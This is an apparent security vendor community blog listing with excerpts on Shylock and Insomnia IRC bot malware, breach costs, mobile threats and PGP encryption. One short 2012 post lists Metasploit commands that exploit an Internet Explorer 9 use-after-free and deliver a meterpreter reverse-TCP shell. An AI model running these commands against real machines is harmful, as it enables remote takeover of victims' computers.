
Security Community Blog

Showing posts tagged with Endpoint Encryption
Showing posts in English
Brandon Noble | 28 Aug 2012 | 0 comments

We have been seeing a recent wave of Trojan.Shylock variants with a lot more functionality than the older versions we have been used to.

Initially, many of these variants are detected generically as Backdoor.Trojan or Trojan Horse, but our new Shylock heuristic signatures (Trojan.Shylock!gen6 and Trojan.Shylock!gen7) should be changing this to a more accurate naming convention, and should be picking up a much wider spread of these threats.

Additionally, we are hearing about some behavior that we have not been able to reproduce. Reports are saying that legitimate documents are getting hidden and then shortcuts with the same name as the document are being added in their place. These shortcuts actually launch a thumbs.db(x) file which is the Shylock Trojan, and they are meant to trick the user into running the threat. This is common behavior for threats, as noted in this blog article from May 2012,...

Brandon Noble | 25 Apr 2013 | 2 comments

I. BACKGROUND:
We have been receiving a few scattered cases of outbreaks from a file labeled snkb00ptz.exe or snkb0ptz.exe, but it seems to be on the rise.

It's normally considered poor troubleshooting to use the file name for any type of identification of a threat, but recent examples have made this practical. Even though these files were detected as many different threat names and families (Trojan.gen, w32.IRCBot.NG, Downloader, etc), the cases all reported the same behavior and symptoms.

After some additional investigation, Symantec Security Response has broken out detection for W32.Inabot. That's short for the Insomnia IRC bot. More information is available from the makers of this threat in their manual, here: http://pastebin.com/dvpu8Zwb

For those of you familiar with W32.Changeup, much of this...

K S Sharma | 17 Feb 2013 | 1 comment

Dear All,

As security threats are increasing day by day, you need a more proactive approach to find the latest details and tighten security. Hacker groups are continuously working to break security measures, but at the same time organizations are spending lots of resources and money to make business smooth and secure.

I think it is not just spending money on IT security and having security experts that makes you secure by implementing security solutions. It is equally important how intelligently and smartly you take care of each side of security threats and configure accordingly.

Please also read the threads below for updates on some recent security threats


  • Shamoon virus targets energy sector infrastructure

            ...

jjesse | 14 Jan 2013 | 0 comments

I have been using Evernote for a while but was recently introduced to the Chrome extension Evernote Clipper, and this has changed how I browse the web and, more importantly, how I browse Symantec Connect. So I started clipping various blog entries, articles and other information stored on the site to save for later. In order to help share this information I will be creating a round up of various posts I've found interesting or important and post them to both my blog and also Symantec Connect. Since I'm focusing on Symantec Security this year, these posts will be filed under the security portion of Connect.

So let's get started on Round Up #1 (maybe 1 day I'll come up with a better name or title)


...
Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
A vulnerability was discovered in IE 9 on 17/09/2012, which can be exploited with the following commands in BackTrack 5 R2

Metasploit:

- msfupdate
- use exploit/windows/browser/ie_execcommand_uaf
- set SRVHOST 192.168 ...
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168 ...
- exploit

Let's beware the networking.

hugs

Jhildy11 Xcend Group | 14 Aug 2012 | 0 comments

In case you missed it, see the archived version from last week's webinar "Learn How to Protect Even Your Hardest-to-Find IP with Intelligent Data Loss Prevention"

With the average cost of a breach now topping an incomprehensible $7 million, more and more organizations are looking to Data Loss Prevention solutions to protect their highest value data. Join XCEND, a Platinum Symantec partner and DLP Master Specialist, to learn how you can accurately detect and protect all types of confidential data wherever it is stored or used. (54 min)

Here's the link to see the archived version: https://www2.gotomeeting.com/register/430279362 or go to our website at www.xcendgroup.com to see all of...

Mira Davda | 25 May 2012 | 0 comments

The value of data is appreciating, especially with organizations rapidly adopting new technologies to provide access to business information anywhere, at any time. This means threats to data or information translate into business risks to business. These risks, related to reputation, customer loyalty, finance and legal, are not only serious but also quantifiable. The first benchmark Cost of Data Breach Study in India, conducted by the Ponemon Institute on behalf of Symantec, revealed that the average organizational cost of a data breach in India is INR 53.4 million (53.4 crore), with malicious breaches by hackers or criminal insiders being the most expensive type at INR 4,224 for one compromised record.

The report further components of the total cost: detection, escalation and redressal formed a significant component, averaging INR 16.4 million (1.64 crore) and INR 20.9 million (2.09 crore) respectively. Victims lost INR 14.6 million (1.46 crore...

Marie Pettersson | 10 Feb 2012 | 1 comment

I am absolutely blown away with what is going on in the mobile world and the latest numbers from IDC demonstrate the fact that mobile is breaking every record. A year on year growth of 57% for Smartphone shipments compared to last year. Do I need to say more? These devices will be used for business and private matters and they function merely as a pc. So what is the difference?  I think that we don’t consider that question enough, we simply use it together with all the features we can get our hands on; mobile banking and payments, browsing the web, reading emails, downloading apps, gathering intelligence, and the list goes on... So why should we separate the way we manage mobile devices from any other device or endpoint connected to our network?

Adaptive Mobile did a report last year on the mobile threats and their key conclusions were that mobile scams are way more profitable than the traditional pc scams (2%...

Ctrox | 30 Jan 2012 | 1 comment

Aliens have invaded earth with the intent to wipe out mankind. But ex-scientist turned cable technician, David Levinson (Jeff Goldberg), helps mobilize a plan to use the “common cold” or computer “virus” to fight back against the alien species and bring down their defenses in the 1996 movie Independence Day.

While the story is fiction, the potential damage that a virus or malware can do to businesses and people’s lives is all too real. In fact, attackers unleashed an average of more than nine new threats every second in 2010.

The healthcare industry knows firsthand about virus outbreaks. Take the Conficker virus that infected hundreds of MRI devices around the world. In fact, healthcare leads the industry in data breaches with more than 400 health...

Kelvin_Kwan | 13 Jul 2011 | 16 comments

We are once again writing to follow up on our earlier post related to a similar issue from January. This time, it’s for Mac OS X upgrades to Apple’s just-released 10.6.8 update and PGP Whole Disk Encryption for Macs.

Much like the previous post, Apple’s automated Mac OS X 10.6.8 Software Update mechanism bypasses the protections PGP Corporation had put around a critical file needed for normal system startup. This time, however, users who are running 10.1.1-Build 10 and newer had no problems with the Apple 10.6.8 update, as expected. Users running older versions, however, ran into problems.

As communicated previously, the PGP Engineering team discovered that the Apple automated Software Update mechanism bypassed the protections PGP built in to protect the boot.efi file.  This...